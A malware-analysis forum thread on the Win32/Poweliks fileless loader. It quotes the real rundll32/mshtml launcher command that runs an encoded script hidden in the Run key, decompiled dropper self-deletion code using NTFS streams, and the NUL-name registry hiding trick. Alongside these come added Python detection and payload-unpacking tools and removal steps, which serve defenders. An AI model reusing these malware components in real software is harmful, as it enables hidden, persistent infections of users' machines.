Win32/Poweliks


Win32/Poweliks

Postby EP_X0FF » Tue Jul 15, 2014 10:44 am

Some non-typical malware which doesn't get any attention from "security experts" and other internet clowns. Maybe because of this it is not well detected on VT.

The key features of it, making it non-typical:

1) This malware lives in a registry value.
2) Non-typical dropper self-deletion method, nothing zero-day though.
3) Malware startup location protection in a backdoor Sirefef way.
4) It downloads, installs and uses Windows KB968930 (MS PowerShell).

More details below.

1) This malware is stored under the key HKCU\Software\Microsoft\Windows\CurrentVersion\Run and its autostart location is invisible to regedit; why is explained in part 3.

img1.png


That's what is really here.

img2.png


The "Unnamed" value is a forged registry value that holds the command to execute the malware script stored in the "Default" value. Exactly this value makes regedit crazy.

The autostart malware script is below.

Code:
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write("\74script language=jscript.encode>"+(new%20ActiveXObject("WScript.Shell")).RegRead("HKCU\\software\\microsoft\\windows\\currentversion\\run\\")+"\74/script>")


Its purpose: read, encode and execute the script stored in the "Default" value. The decoded malware is now set as a process environment variable named "a" and contains additional code to execute, stored again as script code; let's call it ScriptA. It is named ScriptA.txt in the attached archive. The decoded script is attached as ScriptB.txt. As you can see, they use base64 encoding multiple times for the layered payload. Inside ScriptB you can find another base64-encoded blob, which is attached as PayloadA.txt. This is a base64-encoded dll which is the actual malware, designed to run inside a zombified copy of dllhost.exe (this malware is aware of WOW64 and will select the appropriate version of this executable: Wow64DisableWow64FsRedirection, %windir%\syswow64\dllhost.exe or %windir%\system32\dllhost.exe). The final payload dll (attached as payload.dll) is packed with MPRESS v2.19. Unpacking MPRESS is similar to manually unpacking UPX.

This dll is simple and is capable of downloading and executing arbitrary files on the infected machine (WinExec). Also, because it is used in the startup process, this dll is also responsible for zombifying the dllhost.exe process and for self-injection through NtQueueApcThread.

2) It uses NTFS ADS for dropper self-deletion and the more trivial MoveFileEx with MOVEFILE_DELAY_UNTIL_REBOOT if the first method failed. After self-deletion the malware persists on the infected computer only in the zombified processes' VA and in the registry.

First the dropper attaches itself as a stream to the dropper, e.g. C:\malware.exe -> C:\malware.exe:0 where 0 is an NTFS data stream copy of malware.exe. Next it spawns a process from the ADS and calls DeleteFile.

Yeah I too can F5 in HexRays.
Code:
#include <windows.h>
#include <stdio.h>
#include <string.h>

// Hex-Rays output of the dropper's self-deletion routine, cleaned up:
// copy the running executable into an alternate data stream of itself,
// start the copy from that stream, and fall back to a delayed delete.
signed int __stdcall sub_401696(LPCSTR lpExistingFileName)
{
  char NewFileName[0x1000];                       // stack buffer for "<path>:0"
  struct _STARTUPINFOA StartupInfo;
  struct _PROCESS_INFORMATION ProcessInformation;

  // build the ADS name, e.g. C:\malware.exe -> C:\malware.exe:0
  snprintf(NewFileName, 0xFFFu, "%s:0", lpExistingFileName);
  if ( CopyFileA(lpExistingFileName, NewFileName, 0) )
  {
    StartupInfo.cb = 68;                          // sizeof(STARTUPINFOA) on 32-bit
    memset(&StartupInfo.lpReserved, 0, 0x40u);    // zero the remaining fields
    // launch the copy that lives in the stream
    if ( CreateProcessA(NewFileName, 0, 0, 0, 0, 0, 0, 0, &StartupInfo, &ProcessInformation) )
    {
      CloseHandle(ProcessInformation.hThread);
      CloseHandle(ProcessInformation.hProcess);
      return 1;
    }
    DeleteFileA(NewFileName);                     // spawn failed: remove the stream copy
  }
  else
  {
    // ADS copy failed: schedule removal on the next reboot instead
    if ( MoveFileExA(NewFileName, 0, MOVEFILE_DELAY_UNTIL_REBOOT) )
      return 1;
  }
  return 0;
}


3) Embedded nulls are used for protecting the startup key HKCU\Software\Microsoft\Windows\CurrentVersion\Run from removal and for hiding the actual run value (regedit cannot handle the incorrect value name and cancels listing the items).

The malware payload dll inside the dllhost zombie process additionally works as a watchdog and will recover the malware startup registry values if they are removed.


Detection and removal instructions:

This malware can be easily revealed because of the invasive self-protection it uses. Autoruns and Process Explorer from Sysinternals are all you need to detect the presence of this malware.

Locate and terminate dllhost.exe running without a parent (it is launched by powershell, which exits afterwards).
regdelnull hkcu -s to remove the forged Run subkey.
Regedit - delete the whole HKCU\Software\Microsoft\Windows\CurrentVersion\Run key.


Sample courtesy of R136a1
https://twitter.com/MalwareChannel/stat ... 6885412864

Also thanks to B-boy/StyLe/ who brought attention to this malware.
Ring0 - the source of inspiration
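As an added defender-side example (my code, not EP_X0FF's and not from the thread's attachments): a small Python script that applies the detection points of the post above to a Run-key listing. It flags a value whose name contains NUL or other non-printable characters (the trick that makes regedit abort listing the key), the rundll32 javascript:/mshtml launcher string, and Windows Script Encoder output (the `#@~^` prefix). The sample Run-key contents are constructed. The `enumerate_value_names_win32` helper is Windows-only and is an assumption about how to get at such names from Python: it calls RegEnumValueW through ctypes and cuts the name at the returned length, so an embedded NUL survives instead of ending the string the way it does in regedit.

```python
"""Flag Run-key values hidden from regedit by a NUL-containing value name,
plus the rundll32/mshtml launcher and Script Encoder payload described above."""
import ctypes
import sys

ERROR_NO_MORE_ITEMS = 259


def has_hidden_name(name: str) -> bool:
    """True if the value name contains a NUL or other non-printable character.
    regedit cannot display such a name and stops listing the key. The empty
    name is the (Default) value and is not suspicious by itself."""
    return any(ch == "\x00" or not ch.isprintable() for ch in name)


def looks_like_script_launcher(data: str) -> bool:
    """rundll32 pointed at mshtml's RunHTMLApplication with a javascript: URL."""
    d = data.lower()
    return ("rundll32" in d and "javascript:" in d
            and "mshtml" in d and "runhtmlapplication" in d)


def looks_like_script_encoder(data: str) -> bool:
    """Windows Script Encoder (JScript.Encode/VBScript.Encode) output starts with '#@~^'."""
    return data.lstrip().startswith("#@~^")


def scan_run_values(values):
    """values: iterable of (value_name, value_data). Returns [(name, [reasons])]."""
    findings = []
    for name, data in values:
        reasons = []
        if has_hidden_name(name):
            reasons.append("value name contains NUL/non-printable characters (hidden from regedit)")
        if looks_like_script_launcher(data):
            reasons.append("rundll32 javascript:/mshtml launcher")
        if looks_like_script_encoder(data):
            reasons.append("Windows Script Encoder payload")
        if reasons:
            findings.append((name, reasons))
    return findings


def enumerate_value_names_win32(subkey=r"Software\Microsoft\Windows\CurrentVersion\Run"):
    """Windows only (assumed approach). Calls RegEnumValueW directly so the
    returned character count, not a NUL terminator, decides where a name ends."""
    import winreg                      # Windows-only modules, imported lazily
    from ctypes import wintypes
    advapi32 = ctypes.WinDLL("advapi32", use_last_error=True)
    RegEnumValueW = advapi32.RegEnumValueW
    RegEnumValueW.argtypes = [wintypes.HKEY, wintypes.DWORD, wintypes.LPWSTR,
                              wintypes.LPDWORD, wintypes.LPDWORD, wintypes.LPDWORD,
                              wintypes.LPBYTE, wintypes.LPDWORD]
    RegEnumValueW.restype = wintypes.LONG
    names = []
    with winreg.OpenKey(winreg.HKEY_CURRENT_USER, subkey) as key:
        index = 0
        while True:
            buf = ctypes.create_unicode_buffer(16384)   # registry value names are at most 16383 chars
            cch = wintypes.DWORD(16384)
            rc = RegEnumValueW(key.handle, index, buf, ctypes.byref(cch), None, None, None, None)
            if rc == ERROR_NO_MORE_ITEMS:
                break
            if rc != 0:
                raise ctypes.WinError(rc)
            names.append(buf[:cch.value])              # slicing keeps embedded NULs; .value would not
            index += 1
    return names


# Constructed stand-in for the Run key layout described in the post (not captured data).
SAMPLE_RUN_VALUES = [
    ("OneDrive", r"C:\Users\user\AppData\Local\Microsoft\OneDrive\OneDrive.exe /background"),
    ("", "#@~^constructed-placeholder-for-the-encoded-script^#~@"),   # (Default): encoded script
    ("\x00", 'rundll32.exe javascript:"\\..\\mshtml,RunHTMLApplication ";'
             'document.write("\\74script language=jscript.encode>"'
             '+(new ActiveXObject("WScript.Shell")).RegRead("HKCU\\\\software\\\\microsoft\\\\windows\\\\currentversion\\\\run\\\\")'
             '+"\\74/script>")'),
]

if __name__ == "__main__":
    for name, reasons in scan_run_values(SAMPLE_RUN_VALUES):
        print(repr(name), "->", "; ".join(reasons))
    if sys.platform == "win32":
        # only names are fetched here; the NUL check alone is enough to spot the hidden value
        for name, reasons in scan_run_values((n, "") for n in enumerate_value_names_win32()):
            print("live:", repr(name), "->", "; ".join(reasons))
```

On the constructed sample the scan reports the (Default) value as Script Encoder output and the NUL-named value for both its name and its launcher string; the OneDrive entry is not reported.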

Re: Win32/Poweliks

Postby B-boy/StyLe/ » Tue Jul 15, 2014 11:14 am

Thanks for the detailed analysis. :)

Btw, credits go to aharonov and Picasso as well. We worked together on the latest variant, which hijacks HKEY_CURRENT_USER\Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5} instead of HKCU\Software\Microsoft\Windows\CurrentVersion\Run.

Regards,
Georgi

Re: Win32/Poweliks

Postby EP_X0FF » Tue Jul 15, 2014 11:18 am

I assume malware authors will intensively move startup locations and payload script encoding :)
Ring0 - the source of inspiration

Re: Win32/Poweliks

Postby elise025 » Tue Jul 15, 2014 12:47 pm

Thanks for the great write-up. Does anyone know how this is spread? I've been able to find droppers, but zero info about distribution, unfortunately.
Some info available here: http://malware.dontneedcoffee.com/2014/ ... otnet.html

Re: Win32/Poweliks

Postby EP_X0FF » Tue Jul 15, 2014 2:32 pm

Exactly this binary was the payload of a CVE-2012-0158 exploited RTF document.

Just a quick addition to the first post - I completely forgot to add the original encoded data.
It is the Windows Script Encoder-encoded data from the Run "Default" value. In the attachment: original + fully decoded.
Ring0 - the source of inspiration
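The first post describes base64 wrapped in base64 several times with a dll at the bottom, and this post adds that the outermost layer is Script Encoder output. The following added example (my code, not the thread's and not the attached scripts) peels nested base64 layers out of a script blob and identifies a layer as a PE image by its MZ header, e_lfanew and "PE\0\0" signature. The script blob and the PE-shaped bytes are constructed; Script Encoder decoding itself is not implemented here, the input is assumed to be the already decoded script text.

```python
"""Peel nested base64 layers out of a script blob and report any layer that is
a PE image (MZ header plus a valid e_lfanew pointing at 'PE\\0\\0')."""
import base64
import binascii
import re
import struct

# Long runs only: identifiers and short literals are never 64 base64 chars long.
B64_RUN = re.compile(rb"[A-Za-z0-9+/]{64,}={0,2}")


def decode_candidate(run: bytes):
    """Decode a base64-looking run with normalised padding; None if it is not valid base64."""
    run = run.rstrip(b"=")
    if len(run) % 4 == 1:            # impossible base64 length: drop the stray trailing char
        run = run[:-1]
    run += b"=" * (-len(run) % 4)
    try:
        return base64.b64decode(run, validate=True)
    except binascii.Error:
        return None


def looks_like_pe(data: bytes) -> bool:
    """MZ header, e_lfanew inside the buffer, and the PE signature where it points."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    return e_lfanew + 4 <= len(data) and data[e_lfanew:e_lfanew + 4] == b"PE\0\0"


def peel_layers(blob: bytes, max_depth: int = 6, _depth: int = 0, _out=None):
    """Depth-first: every decodable run becomes a layer; a layer that is not a PE
    is scanned again for further base64 runs, which is how a layered payload unfolds."""
    if _out is None:
        _out = []
    if _depth >= max_depth:
        return _out
    for m in B64_RUN.finditer(blob):
        decoded = decode_candidate(m.group(0))
        if decoded is None:
            continue
        layer = {"depth": _depth + 1, "offset": m.start(), "size": len(decoded),
                 "is_pe": looks_like_pe(decoded), "data": decoded}
        _out.append(layer)
        if not layer["is_pe"]:
            peel_layers(decoded, max_depth, _depth + 1, _out)
    return _out


def extract_embedded_pe(blob: bytes):
    """Return the first PE image found at any nesting depth, or None."""
    for layer in peel_layers(blob):
        if layer["is_pe"]:
            return layer["data"]
    return None


# ---- constructed sample: a PE-shaped byte string inside two script layers ----
FAKE_PE = (b"MZ" + bytes(58) + struct.pack("<I", 0x80)      # e_lfanew -> 0x80
           + bytes(0x80 - 0x40) + b"PE\0\0" + bytes(200))
INNER_SCRIPT = (b'var dll = "' + base64.b64encode(FAKE_PE)
                + b'"; /* constructed stand-in for the dll-carrying script */')
OUTER_SCRIPT = (b'var a = "' + base64.b64encode(INNER_SCRIPT)
                + b'"; /* constructed stand-in for the outer script */')

if __name__ == "__main__":
    for layer in peel_layers(OUTER_SCRIPT):
        print(f"depth {layer['depth']} at offset {layer['offset']}: "
              f"{layer['size']} bytes, PE={layer['is_pe']}")
```

Running it on the constructed blob yields two layers: the inner script at depth 1 and the PE image at depth 2. On a real sample the depth-2 layer would be the packed dll that the first post says is injected into dllhost.exe, ready for unpacking.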

Re: Win32/Poweliks

Postby TwinHeadedEagle » Tue Jul 15, 2014 2:56 pm

I am hoping I will have some case these days, although it doesn't seem too complex. I cannot find what this malware actually does?

Re: Win32/Poweliks

Postby EP_X0FF » Tue Jul 15, 2014 3:03 pm

MAXS wrote:I am hoping I will have some case these days, although it doesn't seem too complex. I cannot find, what this malware actually does?


This is a loader type of malware.

It is capable of downloading and executing arbitrary files on the infected computer (I assume it is a sort of "tasks" in their C&C panel). Additionally it sends installation feedback information to the malware URLs.
You can assume that if the computer is infected with this, it will be full of other malware running together.
Ring0 - the source of inspiration

Re: Win32/Poweliks

Postby TwinHeadedEagle » Tue Jul 15, 2014 3:05 pm

Yes, I can imagine probably a bunch of Adware along with this malware :lol:

Thanks for the info.

Re: Win32/Poweliks

Postby rkhunter » Thu Jul 31, 2014 4:01 pm

Poweliks: the persistent malware without a file

https://blog.gdatasoftware.com/blog/art ... -file.html

Re: Win32/Poweliks

Postby TwinHeadedEagle » Sun Aug 03, 2014 1:50 pm

Does someone have these hashes?

4727b7ea70d0fc00f96a28de7fa3d97fa9d0b253bd63ae54fbbf0bd0c8b766bb
e8d6943742663401e5c44a5fa9cfdd8fad6a9a0dc0f886dc77c065a86c0e10aa

Or this one?

BFA2DC3B9956A88A2E56BD6AB68D1F4F675A425A
